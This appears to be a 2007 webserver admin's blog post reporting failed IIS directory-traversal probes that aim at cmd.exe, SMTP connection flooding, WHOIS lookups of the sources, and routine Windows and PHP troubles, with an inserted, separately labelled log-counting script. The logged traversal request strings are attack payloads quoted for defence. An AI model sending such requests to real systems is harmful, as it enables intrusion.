Who says Windows is secure….

Though surely just a script and a lot of attempts to hack into a Windows system, this is what I found in last week's webserver log:
222.189.7.29 - - [13/Feb/2007:07:25:54 +0100] "GET /cgi-bin/query/scripts/..%5c%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 815
222.189.7.29 - - [13/Feb/2007:07:25:55 +0100] "GET /cgi-bin/query/scripts/root.exe?/c+dir HTTP/1.0" 404 782
222.189.7.29 - - [13/Feb/2007:07:25:59 +0100] "GET /cgi-bin/query/msadc/..À/..À/..À/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 809
222.189.7.29 - - [13/Feb/2007:07:26:00 +0100] "GET /cgi-bin/query/msadc/..À/../..À/../..À/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 815
222.189.7.29 - - [13/Feb/2007:07:26:01 +0100] "GET /cgi-bin/query/msadc/..À¯..À¯..À¯../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 809
222.189.7.29 - - [13/Feb/2007:07:26:05 +0100] "GET /cgi-bin/query/msadc/..À¯../..À¯../..À¯../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 815
222.189.7.29 - - [13/Feb/2007:07:26:06 +0100] "GET /msadc/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir" 403 671
222.189.7.29 - - [13/Feb/2007:07:26:07 +0100] "GET /msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir" 403 671
222.189.7.29 - - [13/Feb/2007:07:26:08 +0100] "GET /msadc/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir" 403 671
222.189.7.29 - - [13/Feb/2007:07:26:08 +0100] "GET /msadc/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir" 403 671
222.189.7.29 - - [13/Feb/2007:07:26:09 +0100] "GET /cgi-bin/query/scripts/..À/..À/..À/..À/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 815
222.189.7.29 - - [13/Feb/2007:07:26:10 +0100] "GET /cgi-bin/query/scripts/..À/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 803
222.189.7.29 - - [13/Feb/2007:07:26:11 +0100] "GET /cgi-bin/query/scripts/..À¯..À¯..À¯..À¯../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 815
222.189.7.29 - - [13/Feb/2007:07:26:12 +0100] "GET /cgi-bin/query/scripts/..À¯../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 803
222.189.7.29 - - [13/Feb/2007:07:26:13 +0100] "GET /scripts/..%c1%1c..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir" 403 671
222.189.7.29 - - [13/Feb/2007:07:26:14 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir" 403 671
222.189.7.29 - - [13/Feb/2007:07:26:17 +0100] "GET /scripts/..%c1%9c..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir" 403 671
222.189.7.29 - - [13/Feb/2007:07:26:18 +0100] "GET /scripts/..%c1%9f../winnt/system32/cmd.exe?/c+dir" 403 671
222.189.7.29 - - [13/Feb/2007:07:26:19 +0100] "GET /cgi-bin/query/scripts/../../../../../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 811
222.189.7.29 - - [13/Feb/2007:07:26:20 +0100] "GET /cgi-bin/query/scripts/../../cmd.exe?/c+dir HTTP/1.0" 404 787
222.189.7.29 - - [13/Feb/2007:07:26:21 +0100] "GET /cgi-bin/query/scripts/../../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 802
222.189.7.29 - - [13/Feb/2007:07:26:22 +0100] "GET /cgi-bin/query/scripts/..?../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 776
222.189.7.29 - - [13/Feb/2007:07:26:23 +0100] "GET /cgi-bin/query/scripts/..?..?..?..?../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 776
222.189.7.29 - - [13/Feb/2007:07:26:24 +0100] "GET /cgi-bin/query/scripts/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 802
222.189.7.29 - - [13/Feb/2007:07:26:24 +0100] "GET /cgi-bin/query/scripts/../../../../../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 811
222.189.7.29 - - [13/Feb/2007:07:26:25 +0100] "GET /cgi-bin/query/scripts/../../cmd.exe?/c+dir HTTP/1.0" 404 787
222.189.7.29 - - [13/Feb/2007:07:26:26 +0100] "GET /cgi-bin/query/scripts/../../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 802
222.189.7.29 - - [13/Feb/2007:07:26:27 +0100] "GET /cgi-bin/query/scripts/..?../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 776
222.189.7.29 - - [13/Feb/2007:07:26:28 +0100] "GET /cgi-bin/query/scripts/..?..?..?..?../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 776
222.189.7.29 - - [13/Feb/2007:07:26:29 +0100] "GET /cgi-bin/query/scripts/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 802
222.189.7.29 - - [13/Feb/2007:07:26:30 +0100] "GET /cgi-bin/query/scripts/cmd.exe?/c+dir HTTP/1.0" 404 781
222.189.7.29 - - [13/Feb/2007:07:26:31 +0100] "GET /scripts/cmd32.exe" 404 675
222.189.7.29 - - [13/Feb/2007:07:26:32 +0100] "GET /cgi-bin/query/scripts/cmd32.exe?/c+dir HTTP/1.0" 404 783
222.189.7.29 - - [13/Feb/2007:07:26:33 +0100] "GET /cgi-bin/query/msadc/..?../..?../..?../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 774
222.189.7.29 - - [13/Feb/2007:07:26:33 +0100] "GET /cgi-bin/query/msadc/..?..?..?../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 774
222.189.7.29 - - [13/Feb/2007:07:26:34 +0100] "GET /cgi-bin/query/msadc/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 800
222.189.7.29 - - [13/Feb/2007:07:26:35 +0100] "GET /cgi-bin/query/script/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 801
222.189.7.29 - - [13/Feb/2007:07:26:36 +0100] "GET /cgi-bin/query/_mem_bin/..À/..À/..À/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 812
222.189.7.29 - - [13/Feb/2007:07:26:37 +0100] "GET /cgi-bin/query/_mem_bin/..À¯..À¯..À¯../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 812
222.189.7.29 - - [13/Feb/2007:07:26:38 +0100] "GET /_mem_bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir" 403 671
222.189.7.29 - - [13/Feb/2007:07:26:39 +0100] "GET /_mem_bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir" 403 671
222.189.7.29 - - [13/Feb/2007:07:26:43 +0100] "GET /cgi-bin/query/_mem_bin/../../../../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 809
222.189.7.29 - - [13/Feb/2007:07:26:43 +0100] "GET /cgi-bin/query/_mem_bin/..?..?..?../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 777
222.189.7.29 - - [13/Feb/2007:07:26:44 +0100] "GET /cgi-bin/query/_mem_bin/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 803
222.189.7.29 - - [13/Feb/2007:07:26:45 +0100] "GET /cgi-bin/query/_vti_bin/..À/..À/..À/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 812
222.189.7.29 - - [13/Feb/2007:07:26:49 +0100] "GET /cgi-bin/query/_vti_bin/..À¯..À¯..À¯../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 812
222.189.7.29 - - [13/Feb/2007:07:26:50 +0100] "GET /_vti_bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir" 403 671
222.189.7.29 - - [13/Feb/2007:07:26:51 +0100] "GET /_vti_bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir" 403 671
222.189.7.29 - - [13/Feb/2007:07:26:51 +0100] "GET /cgi-bin/query/_vti_bin/../../../../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 809
222.189.7.29 - - [13/Feb/2007:07:26:52 +0100] "GET /cgi-bin/query/_vti_bin/..?..?..?../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 777
222.189.7.29 - - [13/Feb/2007:07:26:53 +0100] "GET /cgi-bin/query/_vti_bin/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 803
222.189.7.29 - - [13/Feb/2007:07:26:54 +0100] "GET /cgi-bin/query/bin/scripts/../../../../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 812
222.189.7.29 - - [13/Feb/2007:07:26:55 +0100] "GET /cgi-bin/query/bin/scripts/..?..?..?../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 780
222.189.7.29 - - [13/Feb/2007:07:26:56 +0100] "GET /cgi-bin/query/bin/scripts/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 806
222.189.7.29 - - [13/Feb/2007:07:26:57 +0100] "GET /cgi-bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir" 404 675
222.189.7.29 - - [13/Feb/2007:07:26:58 +0100] "GET /cgi-bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir" 404 675
222.189.7.29 - - [13/Feb/2007:07:26:58 +0100] "GET /cgi-bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir" 404 675
222.189.7.29 - - [13/Feb/2007:07:26:59 +0100] "GET /cgi-bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir" 404 675
222.189.7.29 - - [13/Feb/2007:07:27:00 +0100] "GET /cgi-bin/../../../../winnt/system32/cmd.exe?/c+dir" 404 675
222.189.7.29 - - [13/Feb/2007:07:27:03 +0100] "GET /cgi-bin/..?..?..?../winnt/system32/cmd.exe?/c+dir" 404 675
222.189.7.29 - - [13/Feb/2007:07:27:04 +0100] "GET /cgi-bin/.._../winnt/system32/cmd.exe?/c+dir" 404 675
222.189.7.29 - - [13/Feb/2007:07:27:05 +0100] "GET /cgi-Bin/cmd.exe?/c+dir" 404 675
222.189.7.29 - - [13/Feb/2007:07:27:06 +0100] "GET /cgi-bin/cmd.exe?/c+dir" 404 675
222.189.7.29 - - [13/Feb/2007:07:27:07 +0100] "GET /Cgi-Bin/cmd32.exe?/c+dir" 404 675
222.189.7.29 - - [13/Feb/2007:07:27:07 +0100] "GET /Cgi-Bin/cmd32.exe?/c+dir" 404 675

Clearly someone who's running a script, and I severely doubt his knowledge… Just trying to see if he can get in. Or espionage? The address is said to be located in China:

inetnum: 222.184.0.0 - 222.191.255.255
netname: CHINANET-JS
descr: CHINANET jiangsu province network
descr: China Telecom
descr: A12,Xin-Jie-Kou-Wai Street
descr: Beijing 100088
country: CN
admin-c: CH93-AP
tech-c: CJ186-AP
mnt-by: APNIC-HM
mnt-lower: MAINT-CHINANET-JS
mnt-routes: MAINT-CHINANET-JS

Apart from this, just a few that appear quite regularly:

69.84.207.37 - - [12/Feb/2007:07:02:35 +0100] "GET /No%0Ate-email.htm HTTP/1.1" 403 864
69.84.207.37 - - [12/Feb/2007:07:06:27 +0100] "GET /cgi-bin/count.exe HTTP/1.1" 502 900
69.84.207.37 - - [12/Feb/2007:07:06:28 +0100] "GET /cgi-bin/c%0Aount.exe HTTP/1.1" 404 887
207.234.131.90 - - [12/Feb/2007:09:56:37 +0100] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 893

These are just a few of these, not a lot in a week.
Mail
Someone is trying to blow the SMTP server – for over 24 hours up to now:
%%%%%%%%%%% OPCOM 18-FEB-2007 14:46:13.71 %%%%%%%%%%%
Message from user INTERnet on DIANA
INTERnet ACP SMTP Accept Request from Host: 84.246.98.2 Port: 4977

%%%%%%%%%%% OPCOM 18-FEB-2007 14:46:13.92 %%%%%%%%%%%
Message from user TCPIP$SMTP on DIANA
%TCPIP-W-SMTP_UNBKTRNSIP, client IP address 84.246.98.2 is not backtranslatable
...
%%%%%%%%%%% OPCOM 19-FEB-2007 22:50:57.98 %%%%%%%%%%%
Message from user INTERnet on DIANA
INTERnet ACP SMTP Accept Request from Host: 84.246.98.2 Port: 4144

%%%%%%%%%%% OPCOM 19-FEB-2007 22:50:58.15 %%%%%%%%%%%
Message from user TCPIP$SMTP on DIANA
%TCPIP-W-SMTP_UNBKTRNSIP, client IP address 84.246.98.2 is not backtranslatable
to a host name

I haven't counted the entries, but the attempts occur every 2 minutes or so. Alas, the router has no ability to block him there…
This address is a UK one:
inetnum: 84.246.96.0 - 84.246.103.255
netname: UK-WH-UK-20040830
descr: World Hub Limited
descr: PROVIDER Local Registry
country: GB # US
org: ORG-WHL1-RIPE
admin-c: DA1277-RIPE
tech-c: DA1277-RIPE
status: ALLOCATED PA
mnt-by: RIPE-NCC-HM-MNT
mnt-lower: worldhub-ip
mnt-routes: worldhub-ip
source: RIPE # Filtered

Both ISPs will be informed.
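Since the router cannot block the address, the next best thing is to count the attempts instead of eyeballing them. The script below is an added example (mine, not part of the post) that parses OPCOM records of the kind quoted above, counts SMTP accept requests and "not backtranslatable" warnings per client address, and flags hosts that keep reconnecting at a steady interval. It assumes every OPCOM record begins with a `%%% OPCOM DD-MON-YYYY HH:MM:SS.cc %%%` header line; the thresholds in `flag_persistent_clients()` are illustrative, and only the first two records of the sample are from the post, the rest are constructed.

```python
"""Added example, not code from the original post: count SMTP accept requests
and back-translation warnings per client in OpenVMS OPCOM output, and flag
clients that reconnect at a steady, short interval.

Assumptions: each record starts with a '%%% OPCOM <timestamp> %%%' line; the
thresholds below are illustrative; only the first two sample records are from
the post, the rest are constructed.
"""
import re
from datetime import datetime
from statistics import median
from typing import Dict, List, Tuple

HEADER_RE = re.compile(
    r"^%+\s+OPCOM\s+(\d{2}-[A-Za-z]{3}-\d{4} \d{2}:\d{2}:\d{2}\.\d+)\s+%+$"
)
ACCEPT_RE = re.compile(r"SMTP Accept Request from Host:\s*(\S+)\s+Port:\s*(\d+)")
WARN_RE = re.compile(r"client IP address (\S+) is not backtranslatable")


def parse_opcom(text: str) -> List[Tuple[datetime, str]]:
    """Split OPCOM output into (timestamp, body) records; the body lines of a
    record are joined so a warning wrapped over two lines still matches."""
    records, ts, body = [], None, []
    for line in text.splitlines():
        m = HEADER_RE.match(line)
        if m:
            if ts is not None:
                records.append((ts, " ".join(body)))
            ts, body = datetime.strptime(m.group(1), "%d-%b-%Y %H:%M:%S.%f"), []
        elif line.strip():
            body.append(line.strip())
    if ts is not None:
        records.append((ts, " ".join(body)))
    return records


def summarise_smtp(text: str) -> Dict[str, dict]:
    """Per client: accept count, warning count, first/last seen and the median
    gap in seconds between consecutive accepts (None with fewer than two)."""
    per_host: Dict[str, dict] = {}

    def entry(host: str) -> dict:
        return per_host.setdefault(host, {"accepts": 0, "warnings": 0,
                                          "first": None, "last": None, "_times": []})

    for ts, body in parse_opcom(text):
        a = ACCEPT_RE.search(body)
        if a:
            e = entry(a.group(1))
            e["accepts"] += 1
            e["_times"].append(ts)
            e["first"] = ts if e["first"] is None else min(e["first"], ts)
            e["last"] = ts if e["last"] is None else max(e["last"], ts)
        w = WARN_RE.search(body)
        if w:
            entry(w.group(1))["warnings"] += 1
    for e in per_host.values():
        times = sorted(e.pop("_times"))
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        e["median_interval"] = median(gaps) if gaps else None
    return per_host


def flag_persistent_clients(summary: Dict[str, dict], min_accepts: int = 3,
                            max_median_interval: float = 300.0) -> List[str]:
    """Clients with at least min_accepts connects whose median spacing is at
    most max_median_interval seconds: the ones to report or block upstream."""
    return sorted(h for h, e in summary.items()
                  if e["accepts"] >= min_accepts
                  and e["median_interval"] is not None
                  and e["median_interval"] <= max_median_interval)


SAMPLE_OPCOM = """\
%%%%%%%%%%% OPCOM 18-FEB-2007 14:46:13.71 %%%%%%%%%%%
Message from user INTERnet on DIANA
INTERnet ACP SMTP Accept Request from Host: 84.246.98.2 Port: 4977

%%%%%%%%%%% OPCOM 18-FEB-2007 14:46:13.92 %%%%%%%%%%%
Message from user TCPIP$SMTP on DIANA
%TCPIP-W-SMTP_UNBKTRNSIP, client IP address 84.246.98.2 is not backtranslatable
to a host name

%%%%%%%%%%% OPCOM 18-FEB-2007 14:48:10.03 %%%%%%%%%%%
Message from user INTERnet on DIANA
INTERnet ACP SMTP Accept Request from Host: 84.246.98.2 Port: 4981

%%%%%%%%%%% OPCOM 18-FEB-2007 14:49:30.00 %%%%%%%%%%%
Message from user INTERnet on DIANA
INTERnet ACP SMTP Accept Request from Host: 192.0.2.55 Port: 51022

%%%%%%%%%%% OPCOM 18-FEB-2007 14:50:12.55 %%%%%%%%%%%
Message from user INTERnet on DIANA
INTERnet ACP SMTP Accept Request from Host: 84.246.98.2 Port: 4990

%%%%%%%%%%% OPCOM 18-FEB-2007 14:52:09.40 %%%%%%%%%%%
Message from user INTERnet on DIANA
INTERnet ACP SMTP Accept Request from Host: 84.246.98.2 Port: 4996
"""

if __name__ == "__main__":
    summary = summarise_smtp(SAMPLE_OPCOM)
    for host, e in summary.items():
        print(host, e["accepts"], "accepts,", e["warnings"], "warnings,",
              "median gap:", e["median_interval"])
    print("flag:", flag_persistent_clients(summary))
```

The median rather than the mean is used deliberately: one long pause (the "..." in the post's excerpt) would inflate an average, while a client that really is connecting every two minutes keeps a median near 120 s regardless.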

19-Feb-2007

Quiet on all fronts
that is: nothing but the usual to be done. I still have to process the FTP logs, but it will be part of the full overhaul of the whole site. I think I'll use another program as a portal, another PHP-based program including forums (Phorum, as used by OpenVMS.org, is currently under investigation) or perhaps even something I create myself.
Stay tuned….
Windows woes
The problems with updates on Aphrodite have not been solved. Though the system states that updates are actually installed, some show up time after time again and need to be manually hidden so they stop showing up. I'm not sure Microsoft is really investigating….
PHP woes
Once in a while, the PHP engine breaks and the server will complain it doesn't get a valid response. This applies to both the blog and forums; messages like this occur in the webserver logs:
%HTTPD-W-NOTICED, 17-FEB-2007 16:34:52, CGI:1969, not a strict CGI response
-NOTICED-I-SERVICE, http://www.grootersnet.nl:80
-NOTICED-I-CLIENT, 213.84.186.159
-NOTICED-I-URI, GET (66 bytes) /forums/login.php?logout=true&sid=4e53a23d769172fb7e0d205a5106e3ac
-NOTICED-I-SCRIPT, /forums/login.php forums:[000000]login.php (cgi_exe:phpwasd.exe) FORUMS:[000000]login.php
-NOTICED-I-CGI, xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx (129 bytes) %SYSTEM-F-HPARITH, high performance arithmetic trap, Imask=00000000, Fmask=00000002, summary=02, PC=00000000001E9C94, PS=0000001B
-NOTICED-I-RXTX, err:0/0 raw:708/0 net:708/0

I found that the only solution seems to be: restart the web browser…